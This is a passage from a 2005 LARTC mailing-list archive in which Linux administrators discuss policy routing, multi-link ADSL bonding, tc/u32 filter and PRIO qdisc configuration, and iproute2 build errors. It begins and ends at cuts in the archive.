rule add prio $T3 table $T3 $IP route add default table $T3 proto static \ nexthop via $P1 dev $IF1 weight 1 \ nexthop via $P2 dev $IF2 weight 3 $IP rule add prio $T1 from $P1_NET table $T1 $IP route add default via $P1 dev $IF1 src $IP1 proto static table $T1 $IP route append prohibit default table $T1 metric 1 proto static $IP rule add prio $T2 from $P2_NET table $T2 $IP route add default via $P2 dev $IF2 src $IP2 proto static table $T2 $IP route append prohibit default table $T2 metric 1 proto static $IP route flush cache -- Udv, Nandor From lartc@draxinusom.ch Tue Feb 1 08:11:48 2005 From: lartc@draxinusom.ch (Rene Gallati) Date: Tue, 01 Feb 2005 09:11:48 +0100 Subject: [LARTC] How to bond pppoe links In-Reply-To: <20050131222309.GA31550@legolas.on.net.mk> References: <20050131222309.GA31550@legolas.on.net.mk> Message-ID: <41FF39C4.2070603@draxinusom.ch> Damjan wrote: > I have three ADSL lines that I'd like to use as one big pipe to the > internet. The ADSL service works by establishing a pppoe connection (the > ADSL "modem" is a bridge), and each pppoe interface gets its own IP > address. > This means I'd have to have 4 ethernet interfaces (3 for each > of the ADSL modems and 1 for the LAN) in my gateway. I'd setup the > gateway to NAT the LAN computers. > > Now, I'm not completely sure how would this work, and what to expect. > Any suggestions from someone that has done this (or similar scenario)? Yes it is possible, though it may make only sense iff you have several clients behind the gateway (since for example http is a stateless protocol where most often every single picture and page is fetched using another tcp connection and if you balance it always, you are constantly switching the source ip which breaks ssl and session tracking. Generally you always use the same link for the same destination, which means less balancing, so you need more clients to even it out again) But for help, I have found the nano-howto extremely useful. http://www.ssi.bg/~ja/nano.txt -- C U - -- ---- ----- -----/\/ René Gallati \/\---- ----- --- -- - From lartc@diab.org Tue Feb 1 12:49:50 2005 From: lartc@diab.org (diab) Date: Tue, 1 Feb 2005 13:49:50 +0100 Subject: [LARTC] How to bond pppoe links In-Reply-To: <20050131222309.GA31550@legolas.on.net.mk> References: <20050131222309.GA31550@legolas.on.net.mk> Message-ID: <1003313677.20050201134950@diab.org> D> I have three ADSL lines that I'd like to use as one big pipe to the D> internet. The ADSL service works by establishing a pppoe connection (the D> ADSL "modem" is a bridge), and each pppoe interface gets its own IP D> address. D> This means I'd have to have 4 ethernet interfaces (3 for each D> of the ADSL modems and 1 for the LAN) in my gateway. I'd setup the D> gateway to NAT the LAN computers. It's only possible to "bond" the interfaces correctly (meaning that eg. one ftp download could reach almost the sum speed of all ADSL interfaces) if you have an other computer on the other end that "splits" the packages for you. I've managed to do it but keep in mind that it's only worth it if you have a colocation facility near by where you do not pay after the traffic. It looks like this: lan - gw ====== coloc - internet between the GW (your gateway) and the coloc (the computer you have total control over at a colocation facility) there are any arbitrary number of transports (eg. ADSL lines). the trick is to create one VPN connection over one ADSL line (I am using vtund, ether tunnel over TCP because UDP didnt work for some reason) and bond the tunXX intefaces together on both sides using ifenslave. after this the default route should be set to bond0 and if ip forwarding is enabled on the coloc machine it all miraculously works. vtund should be running as a server on the colocation machine and each client instance on the lan gw should connect using a different ADSL interface. if can be achieved by running pppd with "nodefaultroute" and with the combination of iptables MARK / ip rule / ip route different instances (connecting to different ports on the coloc machine) of vtund client connections will be routed on the correct interface using packet classification and static routes. we've been running an internet cafe on 2x1,5mbit ADSL here in Hungary reliably on this link adding only 2-3ms delay (because of the additional routing / extra computers) and having at least 90% bandwidth of the 3mbit. the colocation computer is also set up at the isp where we're getting the adsl from, so it's relatively "near" in terms of latency. it worked rather shitty (if at all) when one of the lines was 512 and the other one was 1500. i've also heard of isp's in England who support ethernet bonding so you may just order a bunch of adsl lines and bond them together on your end. there might be some in your area as well :) (definitely not here in Hungary though) -- diab From lartc@mailman.ds9a.nl Tue Feb 1 14:42:56 2005 From: lartc@mailman.ds9a.nl (richard lucassen) Date: Tue, 1 Feb 2005 15:42:56 +0100 Subject: [LARTC] multiple defaults Message-ID: <20050201154256.100e586c.mailinglists@lucassen.org> I have 1 100MB NIC with two 2MB-subnets trough a router behind it. I'd like to create multiple default classes: 1: + |\_ 1:10 default, ceiling 100000kbit, rate 96000kbit | |\_ 1:11 ceiling 2048kbit, rate 2048kbit | | | |\_1:110 ceiling 2048kbit, rate 1536kbit | \_1:111 ceiling 2048kbit, rate 512kbit (default subnet1) | \_ 1:12 ceiling 2048kbit, rate 2048kbit | |\_1:120 ceiling 2048kbit, rate 1536kbit \_1:121 ceiling 2048kbit, rate 512kbit (default subnet2) I want to use 1:110 for subnet1 sport 3389 I want to use 1:111 for subnet1 (the rest) I want to use 1:120 for subnet2 sport 3389 I want to use 1:121 for subnet2 (the rest) When selecting u32 match ip dst 10.106.18.0/24 \ match ip protocol 6 0xff \ match ip sport 3389 0xffff \ flowid 1:120 u32 match ip dst 10.106.18.0/24 \ flowid 1:121 All traffic goes to 1:121. The first filter for port 3389 is ok and works. What am I doing wrong? I'd rather do not use fw selectors. Or should I solve this problem another way? Richard. -- ___________________________________________________________________ Recursion: see recursion +------------------------------------------------------------------+ | Richard Lucassen, Utrecht | | Public key and email address: | | http://www.lucassen.org/mail-pubkey.html | +------------------------------------------------------------------+ From lartc@mailman.ds9a.nl Tue Feb 1 14:49:02 2005 From: lartc@mailman.ds9a.nl (richard lucassen) Date: Tue, 1 Feb 2005 15:49:02 +0100 Subject: [LARTC] combining fw and u32 Message-ID: <20050201154902.047e4b23.mailinglists@lucassen.org> Is it possible to create 1 filter rule using fw selectors AND u32 selectors? Richard. -- ___________________________________________________________________ Recursion: see recursion +------------------------------------------------------------------+ | Richard Lucassen, Utrecht | | Public key and email address: | | http://www.lucassen.org/mail-pubkey.html | +------------------------------------------------------------------+ From util@deuroconsult.ro Tue Feb 1 14:58:46 2005 From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Tue, 1 Feb 2005 16:58:46 +0200 (EET) Subject: [LARTC] combining fw and u32 In-Reply-To: <20050201154902.047e4b23.mailinglists@lucassen.org> References: <20050201154902.047e4b23.mailinglists@lucassen.org> Message-ID: On Tue, 1 Feb 2005, richard lucassen wrote: > Is it possible to create 1 filter rule using fw selectors AND u32 > selectors? > > Richard. http://kernel.umbrella.ro if you don't have 2.6.11-rc1. If you have the latest iproute2 you can do: # send a packet with mark 3 and tcp with dport >= 1024 to 1:50 tc filter add dev dummy0 \ protocol ip \ parent 1: prio 13 \ u32 \ match mark 0x0003 0xffff \ match ip dport 0x0400 0x0400 \ flowid 1:50 See this link for more examples: http://kernel.umbrella.ro/net/mark_in_u32/examples.txt > > -- > ___________________________________________________________________ > Recursion: see recursion > > +------------------------------------------------------------------+ > | Richard Lucassen, Utrecht | > | Public key and email address: | > | http://www.lucassen.org/mail-pubkey.html | > +------------------------------------------------------------------+ > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ From lartc@mailman.ds9a.nl Tue Feb 1 15:11:51 2005 From: lartc@mailman.ds9a.nl (richard lucassen) Date: Tue, 1 Feb 2005 16:11:51 +0100 Subject: [LARTC] combining fw and u32 In-Reply-To: References: <20050201154902.047e4b23.mailinglists@lucassen.org> Message-ID: <20050201161151.34a6f4b7.mailinglists@lucassen.org> On Tue, 1 Feb 2005 16:58:46 +0200 (EET) "Catalin(ux aka Dino) BOIE" wrote: > > Is it possible to create 1 filter rule using fw selectors AND u32 > > selectors? > > http://kernel.umbrella.ro if you don't have 2.6.11-rc1. > If you have the latest iproute2 you can do: > > # send a packet with mark 3 and tcp with dport >= 1024 to 1:50 > tc filter add dev dummy0 \ > protocol ip \ > parent 1: prio 13 \ > u32 \ > match mark 0x0003 0xffff \ > match ip dport 0x0400 0x0400 \ > flowid 1:50 > > See this link for more examples: > http://kernel.umbrella.ro/net/mark_in_u32/examples.txt Ok, thnx, unfortunately it's a 2.4 machine. I just saw it in the changelog of 2.6.11rc1. That's a good thing :-) As this machine will be upgraded in the coming months, I'll put 2.6.11 on it. And which version do you call "new iproute2"? R. -- ___________________________________________________________________ Recursion: see recursion +------------------------------------------------------------------+ | Richard Lucassen, Utrecht | | Public key and email address: | | http://www.lucassen.org/mail-pubkey.html | +------------------------------------------------------------------+ From util@deuroconsult.ro Tue Feb 1 15:18:14 2005 From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Tue, 1 Feb 2005 17:18:14 +0200 (EET) Subject: [LARTC] combining fw and u32 In-Reply-To: <20050201161151.34a6f4b7.mailinglists@lucassen.org> References: <20050201154902.047e4b23.mailinglists@lucassen.org> <20050201161151.34a6f4b7.mailinglists@lucassen.org> Message-ID: > As this machine will be upgraded in the coming months, I'll put 2.6.11 > on it. And which version do you call "new iproute2"? If you download it _now_, you'll be ok. :) > > R. > > -- > ___________________________________________________________________ > Recursion: see recursion > > +------------------------------------------------------------------+ > | Richard Lucassen, Utrecht | > | Public key and email address: | > | http://www.lucassen.org/mail-pubkey.html | > +------------------------------------------------------------------+ > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ From lartc@mailman.ds9a.nl Tue Feb 1 16:01:04 2005 From: lartc@mailman.ds9a.nl (richard lucassen) Date: Tue, 1 Feb 2005 17:01:04 +0100 Subject: [LARTC] combining fw and u32 In-Reply-To: References: <20050201154902.047e4b23.mailinglists@lucassen.org> <20050201161151.34a6f4b7.mailinglists@lucassen.org> Message-ID: <20050201170104.413f2b87.mailinglists@lucassen.org> On Tue, 1 Feb 2005 17:18:14 +0200 (EET) "Catalin(ux aka Dino) BOIE" wrote: > > As this machine will be upgraded in the coming months, I'll put > > 2.6.11 on it. And which version do you call "new iproute2"? > > If you download it _now_, you'll be ok. :) Of course :-) But as I'm lazy I wondered if the Debian Sarge (20041019) was new enough ;-) -- ___________________________________________________________________ Recursion: see recursion +------------------------------------------------------------------+ | Richard Lucassen, Utrecht | | Public key and email address: | | http://www.lucassen.org/mail-pubkey.html | +------------------------------------------------------------------+ From sfs_lartc@suder.dk Tue Feb 1 21:05:57 2005 From: sfs_lartc@suder.dk (Steen Suder) Date: Tue, 1 Feb 2005 22:05:57 +0100 Subject: [LARTC] Sessionbased traffic on NANO? Message-ID: <200502012205.57753.sfs_lartc@suder.dk> I use the wellknown nano setup (by Christoph Simon) on a few sites with=20 success. =46rom time to time a user approaches me with problems that seems to=20 originate from the fact that only trafic to the samt DST IP on the net=20 will get out the same link. The problem happens with traffic from applications that contact=20 different IPs in the "same session". An example is Anarchy Online, where the the client contacts a new IP=20 during game login and, hence, this traffic gets out over a new link. In=20 that second the game clients connection to the servers are lost. There exist other examples, but it's always the same issue. I know that this issue has been brought up on several occasions, but I=20 have found no solutions to this "simple" issue. Does anyone have suggestions on how to handle this, besides "nailing"=20 the traffic to a specific uplink, based on DST PORT? =2D-=20 Mvh. / Best regards, Steen Suder From nug@sch.bme.hu Tue Feb 1 21:49:22 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Tue, 01 Feb 2005 22:49:22 +0100 Subject: [LARTC] Sessionbased traffic on NANO? In-Reply-To: <200502012205.57753.sfs_lartc@suder.dk> References: <200502012205.57753.sfs_lartc@suder.dk> Message-ID: <41FFF962.2060803@sch.bme.hu> Hi! Steen Suder wrote: > I use the wellknown nano setup (by Christoph Simon) on a few sites with > success. > > From time to time a user approaches me with problems that seems to > originate from the fact that only trafic to the samt DST IP on the net > will get out the same link. > > The problem happens with traffic from applications that contact > different IPs in the "same session". > > An example is Anarchy Online, where the the client contacts a new IP > during game login and, hence, this traffic gets out over a new link. In > that second the game clients connection to the servers are lost. > > There exist other examples, but it's always the same issue. > > I know that this issue has been brought up on several occasions, but I > have found no solutions to this "simple" issue. > > Does anyone have suggestions on how to handle this, besides "nailing" > the traffic to a specific uplink, based on DST PORT? ,,Nail'' the traffic of the specific user's computer using routing based on his/her source ip address (policy routing). For icq, see my previos post. I think there is no generally useful solution. BTW. There are games that let only one player from a private (nat-ed) network. -- Udv, Nandor From nistnet_user@yahoo.com Wed Feb 2 01:29:02 2005 From: nistnet_user@yahoo.com (js si) Date: Tue, 1 Feb 2005 17:29:02 -0800 (PST) Subject: [LARTC] cross compiling iproute2 Message-ID: <20050202012902.52481.qmail@web41510.mail.yahoo.com> i have to cross compile iproute2 for power pc. i am completely new to cross compiling and would appreciate any help. thanks. __________________________________ Do you Yahoo!? All your favorites on one personal page – Try My Yahoo! http://my.yahoo.com From ViktorHorvath@gmx.net Wed Feb 2 03:46:04 2005 From: ViktorHorvath@gmx.net (Viktor Horvath) Date: Wed, 02 Feb 2005 04:46:04 +0100 Subject: [LARTC] can't understand strange PRIO behaviour Message-ID: <1107315964.718.20.camel@Charon> --=-QfdLKD1ivnqbH5pi1aAo Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Hello everybody, sorry for bothering you, but after some hours, I'm stuck. I'm living in a student's foundation where I want to connect lots of people to a tiny DSL link. We have exactly four types of traffic. We want a really hard PRIO solution (as I promised to someone that group X will only use the link capacity which isn't used by group Y). I could make a PRIO with four classes, but as I want to separate first by MAC address in two groups and separate each group another time afterwards, I decided to put two PRIOs after the main one: PRIO 1: / \ / \ PRIO 10: PRIO 20: / \ / \ / \ / \ SFQ 110: SFQ 120: SFQ 210: SFQ 220: My problem now is, that my filters don't work. In fact, I wrote only one, and all packages get elsewhere, but not in the flow I commanded. Strangely, tc says that my rule is successfully matched. Here are the proofs, my rule filters to flowid 10:2, but everything goes to 20:1. Have I made an error? Am I missing some kernel feature? My versions: Kernel 2.6.10 and newest iproute from Debian unstable (20041019-2). Thank you for reading, Viktor. --------> CONFIGURATION SCRIPT <-------- # Create the main PRIO qdisc tc qdisc add dev ppp0 root handle 1: prio bands 2 priomap 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 # Create the two PRIO sub-qdiscs tc qdisc add dev ppp0 parent 1:1 handle 10: prio bands 2 priomap 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 tc qdisc add dev ppp0 parent 1:2 handle 20: prio bands 2 priomap 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 # Create the four subclasses tc qdisc add dev ppp0 parent 10:1 handle 110: sfq tc qdisc add dev ppp0 parent 10:2 handle 120: sfq tc qdisc add dev ppp0 parent 20:1 handle 210: sfq tc qdisc add dev ppp0 parent 20:2 handle 220: sfq # Filters for classifying # catch-all tc filter add dev ppp0 protocol ip parent 1: prio 2 u32 match ip src 0.0.0.0/0 flowid 10:2 --------> OUTPUT "tc -s qdisc show dev ppp0" <-------- qdisc prio 1: bands 2 priomap 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 Sent 5321336 bytes 9407 pkts (dropped 0, overlimits 0)=20 qdisc prio 10: parent 1:1 bands 2 priomap 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 Sent 2160 bytes 2 pkts (dropped 0, overlimits 0)=20 qdisc prio 20: parent 1:2 bands 2 priomap 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 Sent 5319176 bytes 9405 pkts (dropped 0, overlimits 0)=20 qdisc sfq 110: parent 10:1 limit 128p quantum 1452b=20 Sent 0 bytes 0 pkts (dropped 0, overlimits 0)=20 qdisc sfq 120: parent 10:2 limit 128p quantum 1452b=20 Sent 0 bytes 0 pkts (dropped 0, overlimits 0)=20 qdisc sfq 210: parent 20:1 limit 128p quantum 1452b=20 Sent 5319176 bytes 9405 pkts (dropped 0, overlimits 0)=20 qdisc sfq 220: parent 20:2 limit 128p quantum 1452b=20 Sent 0 bytes 0 pkts (dropped 0, overlimits 0) --------> OUTPUT "tc -s filter show dev ppp0" (bit later) <-------- filter parent 1: protocol ip pref 2 u32=20 filter parent 1: protocol ip pref 2 u32 fh 800: ht divisor 1=20 filter parent 1: protocol ip pref 2 u32 fh 800::800 order 2048 key ht 800 bkt 0 flowid 10:2 (rule hit 13430 success 13430) match 00000000/00000000 at 12 (success 13430 ) --=-QfdLKD1ivnqbH5pi1aAo Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (GNU/Linux) iD8DBQBCAEz8O3SWVYLvaJQRAoamAKCJLLiov6+b+oOUgg235qRcjFLlCgCeJ/fw wVWn6UL9ikwwT/IBMHvGjW4= =7gVc -----END PGP SIGNATURE----- --=-QfdLKD1ivnqbH5pi1aAo-- From jasonb@edseek.com Wed Feb 2 03:16:42 2005 From: jasonb@edseek.com (Jason Boxman) Date: Tue, 1 Feb 2005 22:16:42 -0500 Subject: [LARTC] can't understand strange PRIO behaviour In-Reply-To: <1107315964.718.20.camel@Charon> References: <1107315964.718.20.camel@Charon> Message-ID: <200502012216.42839.jasonb@edseek.com> On Tuesday 01 February 2005 22:46, Viktor Horvath wrote: > Hello everybody, > > sorry for bothering you, but after some hours, I'm stuck. I'm living in > a student's foundation where I want to connect lots of people to a tiny > DSL link. We have exactly four types of traffic. We want a really hard > PRIO solution (as I promised to someone that group X will only use the > link capacity which isn't used by group Y). I could make a PRIO with > four classes, but as I want to separate first by MAC address in two > groups and separate each group another time afterwards, I decided to put > two PRIOs after the main one: Could you perhaps replace your root prio with a classful tbf from recent kernel? > My problem now is, that my filters don't work. In fact, I wrote only > one, and all packages get elsewhere, but not in the flow I commanded. > Strangely, tc says that my rule is successfully matched. Here are the > proofs, my rule filters to flowid 10:2, but everything goes to 20:1. > Have I made an error? Am I missing some kernel feature? My versions: > Kernel 2.6.10 and newest iproute from Debian unstable (20041019-2). Strange. -- Jason Boxman Perl Programmer / *NIX Systems Administrator Shimberg Center for Affordable Housing | University of Florida http://edseek.com/ - Linux and FOSS stuff From Andreas.Klauer@metamorpher.de Wed Feb 2 03:50:43 2005 From: Andreas.Klauer@metamorpher.de (Andreas Klauer) Date: Wed, 2 Feb 2005 04:50:43 +0100 Subject: [LARTC] can't understand strange PRIO behaviour In-Reply-To: <1107315964.718.20.camel@Charon> References: <1107315964.718.20.camel@Charon> Message-ID: <200502020450.43552.Andreas.Klauer@metamorpher.de> On Wednesday 02 February 2005 04:46, Viktor Horvath wrote: > tc qdisc add dev ppp0 root handle 1: prio bands 2 priomap 0 0 0 0 0 0 0 > 0 0 0 0 0 0 0 0 0 > # Create the two PRIO sub-qdiscs > tc qdisc add dev ppp0 parent 1:1 handle 10: prio bands 2 priomap 0 0 0 0 > 0 0 0 0 0 0 0 0 0 0 0 0 > tc qdisc add dev ppp0 parent 1:2 handle 20: prio bands 2 priomap 0 0 0 0 > 0 0 0 0 0 0 0 0 0 0 0 0 [...] > # catch-all > tc filter add dev ppp0 protocol ip parent 1: prio 2 u32 match ip src > 0.0.0.0/0 flowid 10:2 I don't know if it is a bug or whatever, but PRIO doesn't like alien filters. You may only put traffic into a class of the qdisc you attached the filter to. At least this is how it works on my machine (2.4 kernel). So using these filter rules should work as expected: tc filter add dev ppp0 protocol ip parent 1: prio 2 u32 match ip src 0.0.0.0/0 flowid 1:1 tc filter add dev ppp0 protocol ip parent 10: prio 2 u32 match ip src 0.0.0.0/0 flowid 10:2 HTH Andreas From Denis Kot Wed Feb 2 08:37:04 2005 From: Denis Kot (Denis Kot) Date: Wed, 2 Feb 2005 10:37:04 +0200 Subject: [LARTC] Fwd: why there is any traffic in default class? In-Reply-To: <3cfad9ca05013101435f72a4d9@mail.gmail.com> References: <3cfad9ca05013101435f72a4d9@mail.gmail.com> Message-ID: <3cfad9ca050202003741ff9ed9@mail.gmail.com> no one know? ---------- Forwarded message ---------- From: Denis Kot Date: Mon, 31 Jan 2005 11:43:36 +0200 Subject: why there is any traffic in default class? To: lartc@mailman.ds9a.nl I have: tc qdisc add dev imq0 root handle 1: htb default 30 tc class add dev imq0 parent 1: classid 1:1 htb rate 512kbit ceil 512kbit tc class add dev imq0 parent 1:1 classid 1:30 htb rate 64kbit ceil 512kbit then: iptables -t mangle -A PREROUTING -i ppp0 -s 192.168.2.2 -j IMQ --todev 0 tc class add dev imq0 parent 1:1 classid 1:22 htb rate 64kbit ceil 128kbit tc filter add dev imq0 protocol ip parent 1:0 prio 1 u32 match ip src 192.168.2.2 flowid 1:22 so, as I understand any traffic from source 192.168.2.2 AND from interface ppp0 must be going directly in to class 1:22, and default class 30 must not have any traffic. isn=B4t it? --=20 Denis Kot denis?jabber.org.by ICQ: 13680126 Mobil: +375 29 6-1234-78 From util@deuroconsult.ro Wed Feb 2 11:07:24 2005 From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Wed, 2 Feb 2005 13:07:24 +0200 (EET) Subject: [LARTC] combining fw and u32 In-Reply-To: <20050201170104.413f2b87.mailinglists@lucassen.org> References: <20050201154902.047e4b23.mailinglists@lucassen.org> <20050201161151.34a6f4b7.mailinglists@lucassen.org> <20050201170104.413f2b87.mailinglists@lucassen.org> Message-ID: On Tue, 1 Feb 2005, richard lucassen wrote: > On Tue, 1 Feb 2005 17:18:14 +0200 (EET) > "Catalin(ux aka Dino) BOIE" wrote: > >>> As this machine will be upgraded in the coming months, I'll put >>> 2.6.11 on it. And which version do you call "new iproute2"? >> >> If you download it _now_, you'll be ok. :) > > > > Of course :-) But as I'm lazy I wondered if the Debian Sarge (20041019) > was new enough ;-) > > Nope. --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ From Adolf Nepolean Raj Wed Feb 2 11:23:03 2005 From: Adolf Nepolean Raj (Adolf Nepolean Raj) Date: Wed, 2 Feb 2005 16:53:03 +0530 Subject: [LARTC] combining fw and u32 In-Reply-To: <20050201154902.047e4b23.mailinglists@lucassen.org> References: <20050201154902.047e4b23.mailinglists@lucassen.org> Message-ID: hai.. I want to know about packer separation. Tell me the links and some source codes. That will be helpful for my project. From ViktorHorvath@gmx.net Wed Feb 2 20:42:06 2005 From: ViktorHorvath@gmx.net (Viktor Horvath) Date: Wed, 02 Feb 2005 21:42:06 +0100 Subject: [LARTC] can't understand strange PRIO behaviour In-Reply-To: <200502020450.43552.Andreas.Klauer@metamorpher.de> References: <1107315964.718.20.camel@Charon> <200502020450.43552.Andreas.Klauer@metamorpher.de> Message-ID: <1107376926.1549.13.camel@Charon> --=-ibW+9An3RDdi18j3COJs Content-Type: text/plain Content-Transfer-Encoding: quoted-printable On Wed, 2005-02-02 at 04:50 +0100, Andreas Klauer wrote: [...] > I don't know if it is a bug or whatever, but PRIO doesn't like alien=20 > filters. You may only put traffic into a class of the qdisc you attached=20 > the filter to. At least this is how it works on my machine (2.4 kernel). Thanks a lot for this help! It's exactly as you described it, and your rules work fine.=20 On Tue, 2005-02-01 at 22:16 -0500, Jason Boxman wrote: [...]=20 > Could you perhaps replace your root prio with a classful tbf from recent=20 > kernel? It would certainly be better. However, I want a strict hierarchy, so that first PRIO is always served before the second one. Probably I'll have to use CBQ instead of HTB or TBF, as after reading the howto, it seems to me you can only there add priorities for the subclasses. Some little suggestions for the howto: (1) Maybe one could include Andreas' sentence to the PRIO section: "You may only put traffic into a class of the qdisc you attached the filter to." One could add that subclasses are not possible in PRIO (this is quite evident, but some newbies could think of it ;-) (2) The third filter command ("catch-all") in section 9.6.1 # tc filter add dev eth0 protocol ip parent 10: prio 2 flowid 10:2 does not work as it doesn't use a filter. One has to use something like # tc filter add dev eth0 protocol ip parent 10: prio 2 u32 match ip src=20 0.0.0.0/0 flowid 10:2 instead. Thanks a lot! Viktor. P.S. Is there a German translation going on? --=-ibW+9An3RDdi18j3COJs Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (GNU/Linux) iD8DBQBCATseO3SWVYLvaJQRAuUrAJ9sXwBJ8BUoEivV90bG8kxY4YzWDgCeI1PF Mfw1g9J8MjPiwixjkRxbbe0= =8gmq -----END PGP SIGNATURE----- --=-ibW+9An3RDdi18j3COJs-- From rmocius@auste.elnet.lt Wed Feb 2 12:25:07 2005 From: rmocius@auste.elnet.lt (Remus) Date: Wed, 2 Feb 2005 12:25:07 -0000 Subject: [LARTC] iproute2 compilation problem References: <1107315964.718.20.camel@Charon> <200502020450.43552.Andreas.Klauer@metamorpher.de> <1107376926.1549.13.camel@Charon> Message-ID: <18dc01c50922$3b467b20$6e69690a@RIMAS> Hi folks, I just tried to compile the latest (current) iproute2 and got these errors: arpd.c:19:20: db_185.h: No such file or directory arpd.c:42: error: parse error before '*' token arpd.c:42: warning: type defaults to `int' in declaration of `dbase' arpd.c:42: warning: data definition has no type or storage class arpd.c: In function `do_one_request': arpd.c:305: error: `DBT' undeclared (first use in this function) arpd.c:305: error: (Each undeclared identifier is reported only once arpd.c:305: error: for each function it appears in.) arpd.c:305: error: parse error before "dbkey" arpd.c:309: error: request for member `sync' in something not a structure or union arpd.c:339: error: `dbkey' undeclared (first use in this function) arpd.c:342: error: request for member `get' in something not a structure or union arpd.c:342: error: `dbdat' undeclared (first use in this function) arpd.c:366: error: request for member `del' in something not a structure or union arpd.c:392: error: request for member `put' in something not a structure or union arpd.c:410: error: request for member `put' in something not a structure or union arpd.c:422: error: request for member `put' in something not a structure or union arpd.c: In function `get_arp_pkt': arpd.c:486: error: `DBT' undeclared (first use in this function) arpd.c:486: error: parse error before "dbkey" arpd.c:517: error: `dbkey' undeclared (first use in this function) arpd.c:520: error: request for member `get' in something not a structure or union arpd.c:520: error: `dbdat' undeclared (first use in this function) arpd.c:530: error: request for member `put' in something not a structure or union arpd.c: In function `main': arpd.c:670: warning: implicit declaration of function `dbopen' arpd.c:670: error: `DB_HASH' undeclared (first use in this function) arpd.c:670: warning: assignment makes pointer from integer without a cast arpd.c:680: error: `DBT' undeclared (first use in this function) arpd.c:680: error: parse error before "dbkey" arpd.c:682: error: `dbkey' undeclared (first use in this function) arpd.c:711: error: `dbdat' undeclared (first use in this function) arpd.c:716: error: request for member `put' in something not a structure or union arpd.c:721: error: request for member `sync' in something not a structure or union arpd.c:727: error: parse error before "dbkey" arpd.c:729: error: request for member `seq' in something not a structure or union arpd.c:729: error: `R_NEXT' undeclared (first use in this function) arpd.c:821: error: request for member `sync' in something not a structure or union arpd.c:840: error: request for member `close' in something not a structure or union arpd.c:844: error: request for member `close' in something not a structure or union make[1]: *** [arpd] Error 1 make[1]: Leaving directory `/home/iproute2/new/Source/Orig/iproute2-050124/misc' make: *** [all] Error 2 My kernel 2.6.10 on Slackware 10 (current) Any ideas? Regards Remus From gypsy@iswest.com Wed Feb 2 14:58:41 2005 From: gypsy@iswest.com (gypsy) Date: Wed, 02 Feb 2005 06:58:41 -0800 Subject: [LARTC] iproute2 compilation problem References: <1107315964.718.20.camel@Charon> <200502020450.43552.Andreas.Klauer@metamorpher.de> <1107376926.1549.13.camel@Charon> <18dc01c50922$3b467b20$6e69690a@RIMAS> Message-ID: <4200EAA1.956B5B83@iswest.com> Remus wrote: > > Hi folks, > > I just tried to compile the latest (current) iproute2 and got these errors: > > arpd.c:19:20: db_185.h: No such file or directory ==SNIP== > make[1]: *** [arpd] Error 1 > make[1]: Leaving directory > `/home/iproute2/new/Source/Orig/iproute2-050124/misc' > make: *** [all] Error 2 > > My kernel 2.6.10 on Slackware 10 (current) > > Any ideas? > > Regards > > Remus Install from slackware/l the db3-3.11-i486-4 db31-3-1-17-i486-1 and db4-4.2.52-i486-2 libraries. gypsy From lists@wildgooses.com Wed Feb 2 15:08:21 2005 From: lists@wildgooses.com (Ed Wildgoose) Date: Wed, 02 Feb 2005 15:08:21 +0000 Subject: [LARTC] Best way to drop avg packet size? Message-ID: <4200ECE5.6030109@wildgooses.com> I am testing VoIP via SIP on my local network and despite a careful setup to prioritise the voip packets I am still getting some small amounts of breakup when the system is under stress. I already my patches to HTB to get it to understand ADSL bandwidth (so I know that this is being accounted for OK), and also with the HTB code patched to not use "hysterisis". It's also only intermittent and seems to affect outbound traffic more than inbound and so I suspect that it's down to the average packet size being the default 1500 bytes..? Sound plausible? So what is the preferred method of reducing the MTU of connections, outwards in particular, but inbound would also be nice? I am currently experimenting with a rule in the forward chain on the router which does a "--set-mss XXX". Is this better or worse than simply changing the MTU on either the router box of the modem? Anyone got any experience of the problems that can occur here? The router also runs a small public mail and web server and so I don't want to start accidently locking people out, or having connection issues. Thanks Ed W From rmocius@auste.elnet.lt Wed Feb 2 15:11:34 2005 From: rmocius@auste.elnet.lt (Remus) Date: Wed, 2 Feb 2005 15:11:34 -0000 Subject: [LARTC] iproute2 compilation problem References: <1107315964.718.20.camel@Charon> <200502020450.43552.Andreas.Klauer@metamorpher.de> <1107376926.1549.13.camel@Charon> <18dc01c50922$3b467b20$6e69690a@RIMAS> <4200EAA1.956B5B83@iswest.com> Message-ID: <196501c50939$7be77780$6e69690a@RIMAS> Gypsy, I was missing only db31-3-1-17-i486-1, but after it install I still get the same errors. Regards Remus > Remus wrote: >> >> Hi folks, >> >> I just tried to compile the latest (current) iproute2 and got these >> errors: >> >> arpd.c:19:20: db_185.h: No such file or directory > ==SNIP== >> make[1]: *** [arpd] Error 1 >> make[1]: Leaving directory >> `/home/iproute2/new/Source/Orig/iproute2-050124/misc' >> make: *** [all] Error 2 >> >> My kernel 2.6.10 on Slackware 10 (current) >> >> Any ideas? >> >> Regards >> >> Remus > > Install from slackware/l the db3-3.11-i486-4 db31-3-1-17-i486-1 and > db4-4.2.52-i486-2 libraries. > > gypsy > > From go0ogl3 Wed Feb 2 15:34:05 2005 From: go0ogl3 (go0ogl3) Date: Wed, 2 Feb 2005 17:34:05 +0200 Subject: [LARTC] iproute2 compilation problem In-Reply-To: <196501c50939$7be77780$6e69690a@RIMAS> References: 